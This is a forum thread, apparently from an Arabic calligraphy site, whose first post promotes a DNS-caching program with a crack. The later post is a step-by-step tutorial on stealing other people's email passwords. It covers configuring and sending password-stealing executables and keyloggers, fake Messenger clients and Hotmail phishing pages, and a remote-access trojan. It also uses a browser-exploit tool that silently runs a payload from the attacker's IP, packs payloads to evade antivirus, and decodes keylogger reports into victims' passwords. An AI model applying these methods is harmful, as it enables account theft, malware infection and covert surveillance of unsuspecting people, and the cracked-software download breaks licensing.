منتديات برعى لفن الخــــــــط العــــــربى Arabic Calligraphy
قُدُوْمُكُمْ إِلَيْنَا وَوُجُوْدِكُمْ مَعَنَا زَادَنَا فَرَحَا وَسُرُوّرَا

وَلأَجْلِكُمْ نَفْرِشُ الْأَرْضَ زُهُوْرُا

أَهْلَا بِكَ وَرَدَّا نَدِيَةْ تَنْضَمُّ لِوُرُوْدِ منتدانا‘ ِ

وَنَتَمَنَىً انّ نَرَىْ مِنِكِ كُلِّ تُمَيِّز
وتزيد المنتدى نورا
منتديات برعى لفن الخــــــــط العــــــربى Arabic Calligraphy
قُدُوْمُكُمْ إِلَيْنَا وَوُجُوْدِكُمْ مَعَنَا زَادَنَا فَرَحَا وَسُرُوّرَا

وَلأَجْلِكُمْ نَفْرِشُ الْأَرْضَ زُهُوْرُا

أَهْلَا بِكَ وَرَدَّا نَدِيَةْ تَنْضَمُّ لِوُرُوْدِ منتدانا‘ ِ

وَنَتَمَنَىً انّ نَرَىْ مِنِكِ كُلِّ تُمَيِّز
وتزيد المنتدى نورا
منتديات برعى لفن الخــــــــط العــــــربى Arabic Calligraphy
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتديات برعى لفن الخــــــــط العــــــربى Arabic Calligraphy

حلفت يوما قلمى بالواحد الفرد الصمد الاتسيل مداده فى جلب ضر لاحد
 
قناة المنتدىالرئيسيةأحدث الصورالتسجيلدخولقناة الخط العربى

 

 من اسرار المحترفين فى النت

اذهب الى الأسفل 
انتقل الى الصفحة : 1, 2, 3  الصفحة التالية
كاتب الموضوعرسالة
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 9:27

وقبل ان اشرح لكم البرنامج لابد من وقفة بسيطة نعرف فيها لماذا تكون
الانترنت بطيئة جدا(مهما كانت سرعة اشتراكك) عندما تكتب اى عنوان مثل [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] فى اى متصفح وتظل تنتظر حتى تفتح الصفحة الاولى للعنوان الذى كتبته.
تعرفون لماذا هذه العملية بطيئة..
ببساطة لان كومبيوترك لايعرف شيىء اسمه [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
فالكومبيوترات لاتتعامل مع اسماء بل ارقام وتحتاج لمن يخبرها عنوان (رقم)
الموقع المراد فتحه والذى يقوم بهذه العملية سيرفرات عالمية ضخمة تسمى DNS
server والضغط عليها شديد لان العالم كله يسألها فى نفس الوقت.
وفى كل مرة تكتب فيها (او تضغط على لينك) عنوان موقع جديد تريد ان تفتحه
يرسل كومبيوترك طلب تحديد العنوان لكومبيوترشركة مزود الانترنت المتصل بها
وبدوره يرسله عبر مسافة طويلة لل DNS Server وعندما يتفضل علينا بالرد
يرسله لكومبيوتر شركة الانترنت والذى يرسله لكومبيوترك وسيادتك منتظر.


الحل بامتياز

وقد عرفت مدى اهمية هذه العملية وتأثيرها على سرعة الانترنت اثناء وبعد
دراستى لشهادة MCSE ولذلك بحثت كثيرا عن برنامج يختصر كل هذا الوقت ويجعل
الكومبيوتر يتصل مباشرة بسيرفرات ال DNS ويأخذ العنوان مباشرة من اسرعهم
ويخزنه فى الهارد ديسك ولا يسأل عنه ابدا مرة اخرى وانما يعطيه للمتصفح
بصورة فورية من ذاكرة الجهاز....هذا مايفعله المحترفون فقط ويحاولون ان
يخفونه عنا ولكن هيهات ليس فى منتدانا


ولقد عثرت على هذا البرنامج النادر فعلا واسمه

3.0.4 ExtraDNS

وظيفة البرنامج

بدون الدخول فى تفاصيل معقدة..فلكل كومبيوتر بوابة خاصة تفصله عن العالم
الخارجى وعنوانها (رقمها) ثابت لكل كومبيوترات العالم وهو 127.0.0.1
وبرنامجنا يقف على هذه البوابة ويتلقى طلبات اى برنامج يحاول الاتصال
بالنت (متصفح..بريد الكترونى..تحديث الويندوز...) ويأخذ اسم الموقع ليحضر
عنوانه..فاءذا كنت زرت الموقع من قبل فانه يرد فى جزء من الثانية واذا لم
تكن زرته من قبل فإنه يتخطى مزود الانترنت ويتصل فورا بعشرة سيرفرات DNS
ويحضر عنوان الموقع من اقربهم او اسرعهم وهذا يتم فى اجزاء من الثانية
ايضا بدلا من وقت قد يصل لدقائق بدون استخدام هذا البرنامج..كل هذا فى صمت
ولن ترى الا الاستجابة الفورية للمتصفح.

يعنى الخلاصة كأنك امتلكت DNS Server بمئات الاف الدولارات خاص بك وحدك و على جهازك ووفرت مالانهاية من اوقات الانتظار المملة

مميزات البرنامج

1- غاية فى السهولة ولايحتاج منك ان تتدخل فى عمله مطلقا فهو يعمل بصمت ولن تشعر الا بسرعة استجابة متصفحك الفورية.
2- يأتى لمتصفحك بعنوان الموقع الذى تريد فتحه بسرعة شديدة لانه يتصل مباشرة بعشرة مواقع DNS فى نفس الوقت .
3- يخزن عناوين (ارقام) المواقع التى طلبتها من قبل فى قاعدة معلوماته ويمد المتصفح بالرقم مباشرة بدون تضييع وقت وانتظار.
4- يعمل مع كل انظمة الويندوز وكل انواع وصلات الانترنت مهما كانت
سرعتها.(الاخوة مستخدمى الفيستا برجاء مراجعة اخر المشاركة للاهمية القصوى)
5- يسرع كل انواع المتصفحات وبرامج البريد الالكترونى وبرامج الداونلود والتورنت والعاب الشبكة.
6- يعمل مع كل برامج تسريع التصفح (مع انها ليست لها اى فائدة
ماعداCfosSpeed وانصح باستخدامه مع هذا البرنامج للحصول على اعلى سرعة
ممكنة ).
7- يمكنك من اضافة واختبار سيؤفرات اسرع لالداء افضل وخفيف جدا على الكومبيوتر

هذه الصورة تبين لكم سيرفرات DNS التى يتصل بها مباشرة واماكن تواجدها

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

شرح البرنامج

البرنامج سهل الاستخدام جدا ولايحتاج التدخل لتعديل الاعدادات الافتراضية
الا عند اضافة سيرفرات اقرب او اسرع وهذه هى الواجهة التى تتكون من خمسة
السنة واليكم شرح كل واحد منها

System

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

شرح طريقة اضافة سيرفرات اسرع او اقرب

و ليست كل سيرفرات الdns سريعة نتيجة الضغط الهائل عليها او لبعدها
الجغرافى عن البلد الذى تعيش فيه ولذلك من الافضل ان تغير السيرفرات
الموجودة فى البرنامج بسيرفرات اسرع واقوى فالرجاء الذهاب للموقع التالى
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وهو سيعطيك اقرب ثلاثة سيرفرات لبلدك مع مئات العناوين لسيرفرات مجانية وسريعة فى كل انحاء العالم...اختبرها واختار اسرعها
انسخ العنوان من صفحة نتيجة البحث او من اى صفحة ويب بها عناوين DN
اختبر العنوان فى البرنامج واذا وجدت زمن استجابته سريع الصقه فى عنوان
فارغ او استبدل واحد من السيرفرات بطيئة الاستجابة (الاواخر فى القائمة)..


التحميل البرنامج مع الكراك

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

بعد تصتيب البرنامج اذهب الى Local Area Connection ثم خصائص ثم Internet Protocol TCP/IP
ثم خصائص واكتب هذا الدانس في ملقم DNS المفضل 127.0.0.1
كما في الصوره

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 10:13

-اختراق البريد عن طريق البرامج ..
2-عن طريق صفحات البي اتش بي php..
3-عن طريق تلغيم الصفحات ..
4-عن طريق اختراق الاجهزة..
5-اختراق البريد بمجرد وضع وصلة للضحية ..
6-عن طريق برامج التخمين ..
7-عن طريق خداع الضحية (باحدى الطرق الذكية )..
8-عن طريق اكواد HTML..
9-عن طريق معرفة المعلومات للضحيه ..
10-عن طريق معرفة الجواب السري للضحية..
11-استرجاع الايميل المسروق..



اولا : عن طريق الباتشات (شرح + تحميل ):

وهي الطريقة تعتمد على ارسال باتش سارق او احد برامج الكيلوقر وفيما يلي نستعرض بعض البرامج (الحديثة والقديمة )لسرقة الباسوردات :

البرنامج الاول:
الاسم hotmail hack
الحجم kb
التحميل : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

الشرح :افتح البرنامج وراح تشاهد

قم باعداد الملف بتعبئة البيانات كالتالي:
الخانة الاولى: ايميلك الذي ستصلك عليه باسورد الضحية
الخانة الثانية: اليوزر نيم للضحية بدون hotmail.com - @msn.com@
الخانة الثالثة: اختار الدومين للايميل hotmail.com - @msn.com@
الخانة الرابعة :اسم موقع حقيقي يتلائم واهتمامات الضحية ..
ويفضل ان يكون ملئ بالصور والمحتويات التي تستغرق وقتا فى فتح كامل الصفحة
وفي الاخير اضغط لتكوين الملف
سيتكون ملف بامتداد htm قم باعادة تسميته باسم يتلائم مع اهتمامات الضحية ...وموضوع الموقع الذي قمت بكتابته عند اعداد الملف..
مع الحذر من ان تغيير الامتداد لانه سيفسد الملف.
(يعني الحين الضحية معاك في الماسنجر العب عليه وقله هذي صفحة لـ(طبعا هذا
حسب اهتمامات الضحية )واكيد انت تكون حاط في البرنامج وصلة موقع لها صلة
بلكلام اللى قلته للضحية )

ارسل الملف للضحية
حينما يقوم بفتحه ستفتح له شاشة مكتوب اعلاها اليوزرنيم الخاص به ..وتطلب ادخال كلمة السر
بمجرد كتابة كلمة السر سيتم ارسالها لك على ايميلك المحدد سابقا..
وهي اهم مرحلة وتسمى redirection كما سيتم فتح الموقع الذي قمت بتحديده امام الضحية
ستصلك كلمة السر على هيئة رسالة بريدية بعنوان Password Recieved
ومن الضروري الاشارة فى هذا ان الصفحة الخادعة التى تظهر للضحية بطلب ادخال الباسورد
يتم استضافتها لدى سيرفر response-o-matic server
وفى حالة عدم وصول الباسورد..قد يعزى ذلك لمشكلة بالسيرفر المضيف

اخطاء شائعة:
-لاترفع الصفحة إلى أحد مواقع الاستضافة !!!
لانه ماراح تقدر تحصل على الباسوورد حتى لو الضحية كتبه

ملاحظات:
-الباسوورد سوف يصلك على Junk Mail وليس Inbox وطبعا الJunk Mail يتمسح اسبوعيا!!!
-البرنامج لايمكن تطبيقه على نفسك لأنه على جهاز واحد ..علشان كذا لااحد يقول جربته على نفسي ومااشتغل!!!
-تستطيع ارسال الصفحة الى الضحية على الوضع Attach اي كملف مرفق .

البرنامج الثاني:
اسم البرنامج :b-sspy
الحجم : 146 kb
التحميل :
الشرح :
افتح البرنامج ومن ثم افتح ملف الاعداد B-S EditServer كما بالصورة :

راح تظهر لك هذي الصورة كل ما عليك هو تعبئة البيانات كما في الصورة :

الحين كذا خلصنا من تجهيز سيرفر البرنامج كل ماعليك هو ارسال الباتش وانتظر الباسوردات

ملاحظة : البرنامج لا يعمل في وندوز اكس بي !!

البرنامج الثالث :
اسم البرنامج:برنامج الانتفاضة
الحجم : 172 kb
التحميل :[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الشرح :

افتح البرنامج ومن ثم افتح ملف الاعداد hotmail كما في الصورة :

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

الان اتبع الصور (اصلا البرنامج عربي وما يحتاج شرح ):

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

الحين كذا خلصنا من تجهيز سيرفر البرنامج كل ماعليك هو ارسال الباتش وانتظر الباسوردات

البرنامج الرابع :
اسم البرنامج :Msn Messenger Password Hacker
الحجم .4 KB
التحميل :في المرفقات
ميزاته :
لا يمكن ضبطه بأي أنتي فايروس .
لا يمكن ضبطه بأي فاحص تروجان أو أي بي سكانر أو الزون ألارم .
اظهار خطأ حقيقي عند التشغيل .
أفضل تصميم ومقتبس من لدى كثير المبرمجين .

الشرح :
1- أرسل الملف الى اي شخص على المسنجر
2- عندما يفتحه , الضحية ستقول لك ان في البرنامج خطأ
3- لاغلاق المسنجر "What $$$" اكتب بالضبط
4- "Welcome Back $$$" عندما يعود اكتب بالضبط
5- سترد الضحية لك اليوزر نيم و الباسوورد
6- لاغلاق البرنامج "Why $$$" اكتب بالضبط

البرنامج الخامس:
اسم البرنامج RO-AGENT
الحجم :969 kb
التحميل : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الشرح :
كل ما عليك تحميل البرنامج وبالمناسبة هذا هو افضل برنامج حديث لسرقة الباسوردات

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

بقي اخر واهم خطوه وهي :"

لتشفير وضغط السيرفر ليصبح حجمه 400 كيلو بايت تقريباً استخدم FSG لتحميله
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++++++
البرنامج السادس :
اسم البرنامج tealth Key Logger
الحجم :
التحميل
:[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الشرح :
KeyLogger غير مرئي يعتبر كأقوى برامج سرقة KeyStorke
لاصطياد البرامج ,ينزل على Win من دون أن يشعر أحد بذلك وتشمل السرقة
الخاصة بهذا البرنامج Usernames & Passwords وأيضا المنافذ النشطة ذو
ملفات txt ويشمل AOL, YAHOO, ICQ, MSN , AIM.

البرنامج السابع :
اسم البرنامج :
Fake MSN Messenger Version 5.0
التحميل :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

هو نسخة مزيفة لبرنامج ام اس ان ميسينجر وكل ماعليك ان تقوم بارسال البرنامج للضحية ..وحينما يقوم بفتحه سيفتح له الميسينجر المزيف
والمتطابق مع الاصلي فى كل الوظائف سيقوم الضحية بادخال اليوزر نيم
والباسورد فتظهر له رسالة خطا ومنها سيتم تسجيل كلمة السر فى جهازه
بالمسار التالي:
C:\program files\folder.log
على هيئة ملف نصي يمكن قراءته بالنوت باد

وللحصول على الملف:
1- استخدام أي من برامج الروبوت السابقة التهيئة للحصول على مسار الملف.
2- ان يكون الضحية قد تم اختراقه من قبلك باحد برامج التروجان
وعجزت عن الحصول على باسورداته خاصة الكاش والتى يقوم الويندوز اكس بي بتشفيرها بدقة128 بت عالية التعقيد
والتى مازالت برامج التروجان لاتحل شفرتها
وبالتالي كل ماعليك خلال الاختراق ان تحصل على الملف من المسار المطلوب
3- ان يكون الجهاز فى متناول يدك مثل جامعة – صديق – عمل - ..
يلاحظ انه لمعرفة هل الميسينجر اصلي ام مزيف يتم كتابة اليوزر نبم about والباسورد fmsn
فاذا ظهرت لك الشاشة الموضحة عاليا المكتوب عليها fake msn فهو المزيف
وايضا المزيف به باج لم يتم حله وهو عدم امكانية عمل streching اي لايمكن تغيير نسب الميسينجر



اسم البرنامج :العطار (عربي )
الحجم : kb 241
التحميل : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
او من هنا : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

الشرح :
افتح البرنامج ووو......شاهد الصور مع انها ما تحتاج لشرح

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

بعد صنع السيرفر راح تلقاه في سطح المكتب باسم RUNME
الان ستقوم بارساله الى الضحية قم بتغيير اسم الملف الى اى اسم مغرى وتقوم بارساله للضحية من خلال برامج الدردشة مثل
MSN MESSENGER او YAHOO MESSENGER او odigo او mirc
وهذا افضل من ارساله عن طريق الايميل لانه عالبا ما يفشل لان معظم سيرفرات
الايميل لها انظمة حماية قوية يمكنها كشف السيرفر ولان هذه الطريقة تكون
غير مقنعة للضحايا من جهة اخرى
يمكن للهاكر المحترفين ان يقوموا فبل ارسال السيرفر بضعطه حتى تقل مساحته او تشفيره حتى لا يكشفه الانتى فيرس
بعد ارسال الباتش كده انتهت مهمتك ولن يبقى سوى ان تتابع التقارير التى يرسلها السيرفرالى ايميلك من جهاز الضحية

التعامل مع التقارير الواردة :
+=-=-=-=-=-=-=-=+
التقارير او الرسائل الى راح يرسلها لك السيرفر ترسل من agent او العميل وعنوانه
"Agent" <billgates@microsoft.com>
اليك انت والذى تعتبر الرئيس

boss Boss" <president@whitehouse.gov>
وعنوانها Keyboard report from workstation 123.
اى تقرير المفاتيح التى استخدمها الضحية فهو عميل او جاسوس يعمل لحسابك فى جهاز الضحية دون علمه

يبدا التقرير بالاتى
اسم مستخدم الويندوز Windows user : Intel
رقم مسلسل التقرير Message number : 0012
البداية Startup
النهاية THE END

هذا التقرير يشتمل على ما يستخدمه الضحية من مفاتيح الكى بورد وبالتالى ما ستخدمه من برامج
وما دخله من مواقع وما يكتبه عند تسجيل الدخول فى المواقع والبرامج المحتلفة اى كلمات السر
والفت نظركم الى عدة ملاحظات هامة

Windows user : A
Message number : 0071
Startup.

[RSHIFT][ALT]jpdhjd g;l[ENTER][RSHIFT]ho,;l[ENTER]hg{kvhg

هذا البرنامج فى غاية الحساسية وهذا يميزه عن برامج اخرى جربتها قد يسقط منها بعض الحرووف التى كتبها الضحية سهوا
ولكن عند ضغط الضحية على المفتاح بشدة او لفترة طويلة قد يكرر الحرف للعديد من المرات وهذا يسهل ملاحظته

اذا كان الضحية يكتب بالعربى فراح تلاقى الحرووف غير متناسقة مثلا: v,lhksd
لو تحب تترجمها اكتبها فى المفكرة بعد التحول للغة العربية بنفس الترتييب تلاقيها: رومانسي

احيانا بعض المفاتيح ( وهى مفاتيح الوظائف ) تكتب باسمائها وليست كالرموز مثلا
[BCK] و [del] و [TAB] و [CTL] و [NUM]

ايضا الارقام التى يكتبها الضحية احيانا تكتب بطريقة مختلفة مثل الموجودة على يمين الكى بورد
0 = [INS]
1 = [END]
2 = [DN]
3 = [PGDN]
4 = [<-]
5 = e
6 = [->]
7 = [HOME]
8 = [UP]
9 = [PGup]

اما عن معرفة الباسورد
فمثلا اذا وجدت مثل هذا فى الرسالة فيعنى ان باسورد الا icq هى 300132776
@@ ICQ Registration @@
300132776

واذا وجدت هذا فاليوزر نيم لموقع cubid هو hiroman والباسورد w75ghu
@@ Welcome to Cupid - Microsoft Internet Explorer @@
hironman[ENTER][ENTER]
@@ Welcome to Cupid - Microsoft Internet Explorer @@
[ALT][LSHIFT]w75ghu,

اما الميسنجر وهو الاهم فالباسورد snowwhitelove123456
@@ Sign in to .NET Messenger Service - MSN Messenger @@
snowwhiteinlove[END][DN][PGDN][<-]e[->][ENTER]

غالبا ما تكون اول 3 او 4 رسائل كافية لمعرفة جميع باسوردات الضحية وقد لا
تحتاج الباقون الا اذا كنت ترغب فى مراقبةالضحية بدقة وباستمرار
لذا فقد يزيد عدد الرسائل مما قد يسبب ازعاجا لك لذلك فانصح باستخدام خاصية ال JUNK MAIL
او الافضل على الاطلاق هو استخدام برنامج الاوت لوك اكبريس لتنقل اليه هذه الرسائل وتفحصها بدقة وانت غير متصل بالانترنت

اهم المزايا والعيوب :
======
واهم ميزات البرنامج انه يمكن من خلال التقارير الواردة معرفة جميع الباسوردات لدى الضحية
حتى الغير مخزنة بالجهاز وهذا ما تعجز عنه جميع برامج الاختراق الاخرى

ويعيبه ان السيرفر يكتشفه الانتى فيرس (ولكن يمكن تشفيره)
كما انه يعمل فى الخلفية اى بالضغط على CTL+ALT+DEL يظهر البرنامج ضمن البرامج العاملة حاليا
وبالتالى قد يكتشفه الضحية ان كان على درجة فائقة من الذكاء وهذا لا يحدث لانه لو كان كذلك لما تم اختراقه من البداية


البرنامج التاسع :
اسم البرنامج : k2ps
التحميل + الشرح = هنا بالمنتدى

للتحميل : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

الهدية الثانية للمبتدئين شرح برنامج k2ps الجديد

البرنامج العاشر :
اسم البرنامج : barrio5
الحجم 50 kb
التحميل + الشرح = هنا بالمنتدى

للتحميل :[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

شرح بالصور لبرنامج barrio_v.5 لجلب الباسوردات



البرنامج الحادي عشر :
اسم البرنامج :stukach
التحميل + الشرح = هنا بالمنتدى
للتحميل : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

برنامج لسرقة الأيميلات stukach

البرنامج الثاني عشر :
اسم البرنامج :barok
التحميل + الشرح = هنا بالمنتدى

شرح برنامج barok

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

البرنامج الثالث عشر :
اسم البرنامج : باتش لسرقة الباسورد للوحش المدمر
الحجم :52 KB
التحميل :بالمرفقات
الشرح :
1- أرسل الملف للضحية بعد تغيير إسمه .
2- عندما يفتحه الضحية سوف يقول لك أن البرنامج لا يفتح (رسالة خطأ) .
3- اكتب +hh+ لكي يتم قطع الإتصال عنه .
4- عندما يعود اكتب +hi+ في نافذة المحادثة وسوف ترى الباسورد وإسم المستخدم امامك .

الحين كذا خلصنا من شرح برامج كثير بس ...ايهما تختار ..
=-=-=-=-=
لمستخدمي وندوز 98 +me +2000 يفضل ان يستخدموا برنامج b-sspy او PRO-AGENT
=+=+=+=+=
لمستخدمي وندوز xp يفضل ان يستخدموا PRO-AGENT
=+=+=+=+=
او يمكن ان تختار احد برامج الكيلوقر وهي كثيرة جدا جدا :
----
PerfectKeylogger_v1451 الافضل
----
KeyLogger SP 11
----
KeyLogger SP 11
----
KeyLogger
----
SC-KeyLogger2
----
I-KeyLogger
---

ثانيا:اختراق البريد عن طريق صفحات البي اتش بي php:

إن صفحة الــ php هي عبارة عن صفحة إنترنت مبرمجة لتظهر بمظهر معين، و تقوم بوظيفة معينة...
و الصفحة التي سنستخدمها للاختراق هي صفحة لها نفس شكل صفحة الهوتميل
و وظيفتها هي أن ترسل المعلومات المكتوبة فيها إلى البريد الإلكتروني الخاص بك...
وهذه من أحدث طرق اختراق البريد
والطريقة سهلة نوعا ما ..وطويلة إلى حد ما ..ولكن مع التركيز وتكرار المحاولة سوف تتعود على استخدامها
والطريقة كالاتي:

1- تجهيز ملف PHP والذي سنعمل عليه:
أولا يجب عليك تحميل الملف المضغوط من المرفقات(يوجد صفحات كثيرة ،اختر التى تناسبك)
وبعدين فكه من الضغط ، وافتحه
ثم ابحث عن هذا الايميل [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وقم بتغيره الى ايميلك الشخصي >> والان احفظ الملف واغلقه.
صورة توضيحية :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

2- حجز موقع يدعم الـ PHP :
الان انتهينا من اول خطوة بقي علينا خطوتين
الحين نبي نحجز موقع مجاني يدعم PHP
وهناك عدة مواقع منها
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
سجل فيه

3- تحميل صفحة الphp الى الموقع:
اظنها سهلة ما يبغالها شرح
4- اعطاء الوصلة الى الضحية لاختراقه:
يعني تعطي اللنك الى فيه صفحة الphp الى الضحية..وتخليه يعبي البيانات المطلوبة

والطريقة انا شارحها هنا بالمتندى بالتفصيل +الصور :

شرح ممل لاختراق بريد الهوتميل عن طريق صفحة الـــ php...
ثالثا:اختراق البريد عن طريق تلغيم الصفحات :
1*
ويتم ذلك بواسطة برنامج godwill
وظيفة البرنامج :له وظائف كثيرة ..افضلها وهي إنك تصمم صفحة مدموجة بباتش
وترسلها للضحية وأول مايفتحها الضحية راح يجيلك الباسوورد وكل شي على حسب السيرفر أو الباتش اللي حطيته بالصفحة.
الشـــرح + التحميل
تم شرحه هنا بالمنتدى بالتفصيل +بالصور

شرح برنامج الاسطورة godwill لعمل مواقع ملغومة وارسال ايميلات ومسجات اسيكيو

2*
او عن طريق برنامج noob
نفس الوظيفة ..بس لولا اختلاف الأراء لبانت السلع
وقد تم شرحه ايضا هنا بالمنتدى بالصور

رابعا:اختراق البريد عن طريق اختراق الاجهزة:

طبعا الطريقة واضحة جدا
كل ما عليك انك تجهز باتش لبرنامج اختراق فيه خاصية اظهار الباسووردات
والبرامج كثيرة ومنها
optixpro
sub7gold
و ....الخ
وقد تم شرح البرامج اللى في الاعلى هنا في المنتدى
!!

وبعدين رسل الباتش للضحية وخذ الايبي بتاعه من الدوز
وافتح البرنامج وحط الايبي ..والباقي اكيد انت عارفه
لكن اهم شيء انك تشفر الباتش وتضغطه حتى لا يستطيع النورتن بتاع الضحية اكتشافه
بعدين ما راح تقدر تسرق باسورداته الا اذا كان مسجلها ..يعني عامل حفظ SAVE









تـــــــــــــــــــابــــــــــــــــع
خامسا:اختراق البريد عن طريق ثغرات المتصفح :

المتطلبات:
1-برنامج لسرقة الباسووردات : اختر اي برنامج يعجبك
2-برنامج EVILHTTP: اضغط هنا للتحميل
3-برنامج FSG :
اضغط هنا للتحميل

الشرح:

1-جهز باتش اي برنامج لسرقة الباسووردات..واضغطه باستخدام برنامج fsg

2-افتح برنامج evilhttp وضع الباتش في الخانة الاولى
واخترالثغرة (mpeg)في الخانة الثانية وخلي النافذة مفتوحة ..اكرر مفتوحة (لا تنزلها تحت، خلها فوق)

3- حول الايبي بتاعك على شكل (Hyper Link) وابعثه للضحية طبعا كلكم راح تسئلوني كيف؟؟ بكل سهولة يعني مثلا هذا الايبي حقي
212.32.125.25
تكتب [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وفي النهاية تكتب اي شي (على حسب اهتمام الضحية ) يعني يبصير كذا

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

ممكن تغير cgi-bafy/photo10256.jpg الى اي كلمة وكذلك الامتداد وذلك حسب
الضحية بس الافضل امتداد لصورة لان لو وضعت exe راح يطلب منه تنزيل
البرنامج ...ضع امتداد لصورة فقط او txt بس jpg افضل

توضيح اكثر:
http:/your ip/what ever you want.any extension

4- بعد فتح الضحية للوصلة ..سيتم تحميل وتشغيل الباتش تلقائيا بدون موافقة الضحية داخل جهاز الضحية
والاهم الباسووردات راح تجي على ايميلك.

سادسا:اختراق البريد عن طريق برامج التخمين :

الطريقة مشهورة جدا..والبرامج التخمينية كثيرة مثل
wwwhack و web cracker و munga bungas و brutus-aet2
وطريقة عمل هذه البرامج هي التخمين لا اكثر فهي تقوم بتخمين كلمات السر
الموجوده باللسته بتاعت البرنامج لكن...هل تعلم كم نسبة نجاح هذه البرامج؟

نسبة نجاحها 10% نعم عشرة بالمئه قد اكون بالغت قليلا فنسبتها ضئيلة جدا
فاتحدى اي شخص يقول انا اخترقت ايميل عن طريق هذه البرامج..فهذه البرامج مستخدمينها كثيرين
والنتائج..لا شيء
الا اذا كان باسورد الضحية يعني زي 3 ارقام او حرف وارقام

هذا شرح لاحد افضل برامج التخمين +التحميل ....جرب يمكن تنفع !!

هدية الرابعة للمبتدئين(برنامج تخمين الباسوورد Brutus + الشرح بالصور )


سابعا:اختراق البريد عن طريق خداع الضحية (باحدى الطرق الذكية


طبعا الخدع كثيرة جدا جدا وكل واحد يستطيع ان يفعل احسن منها بكثير
وهذه بعض الامثلة..طبعا ما تنفع مع الهاكرز الممتازين
وكلها بنفس الطريقة وهي
انك ترسل رسالة للضحية تقنعه فيها بان يكتب باسوورد ايميله

مثال1:/

أخترق أي بريد في الهوتميل بأستخدام نظام الأستطلاع :
** شرح موجز و مختصر لنظام الأستطلاع **
توفر مواقع مزودات البريد الألكنروني كالياهو و الهوتميل هذه الخدمة للهيئات الحكومية و الدولية
و عدد محدود من المواقع علي شبكة الأنترنت .
يسمح هذا النظام لهذه الهيئات الدولية و الحكومية بإستطلاع أي بريد في أحدي هذه المواقع .
** الفائدةالأساسية من الخدمة **
هو مراقبة البريد الألكتروني لأشخاص المشتبه بهم عالميا و دوليا
أو مراقبة بريد الأشخاص الذين يستخدمون البريد الألكتروني لعقد أعمالهم الأجرامية المشبوهة .
و علي الصعيد العربي تستخدم هذه الخدمة ( في السعودية علي وجه الخصوص )
في مراقبة مروجي الصور و الأفلام الجنسية و من يسئء لأسلام علي وجه العموم.
في 19 - 6 - 2002 أستطاع 120 هكرز عالمي من بينهم 4 عرب ( أنا واحد منهم )بتوفير هذه الخدمة لعدد كبير من الهكرز .
و نظرا لأنتشار هذه الطريقة علي المستوي العالمي بواسطة هؤلاء الهكر .
قررنا نحن الأربعة العرب بنشر هذا الطريقة علي المستوي العربي .

** الطريفة كالتالي **
1. أرسل رسالة إلي البريد التالي [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
2. قم بكتابة الموضوع بأسم "Pass Word المرسل"
3. و أملأ النموذج التالي :
First Name :أسمك الأول
Last Name : أسمك الأخير
Conutry/region:الدولة
State:المدينة
Your Pass Word :باس وورد بريد الذي ترسل منه الرسالة
WebSite : 632hack.*******
Code : 127_TheARAbFoX6_632HaCK_497
بعد 3 ساعات ستصلك رسالة بعد التأكد من البيانات المرسلة
تحتوي الرسالة علي **** و زر تكتب في **** الربيد ثم تضغط علي الزر
ثم تستطلع البريد الذي كتبته في ****
ملاحظة :
1. أحتفظ بالرسالة لأستطلاع أي بريد في وقت لاحق.
2. تستخدم هذه الطريقة لبريد الهوتميل فقط .
3. لا تحاول أستطلاع بريدي أو بريد شركات تابعة للهوتميل .
4. أنسخ رقم الكود كما هو من دون تغيير .
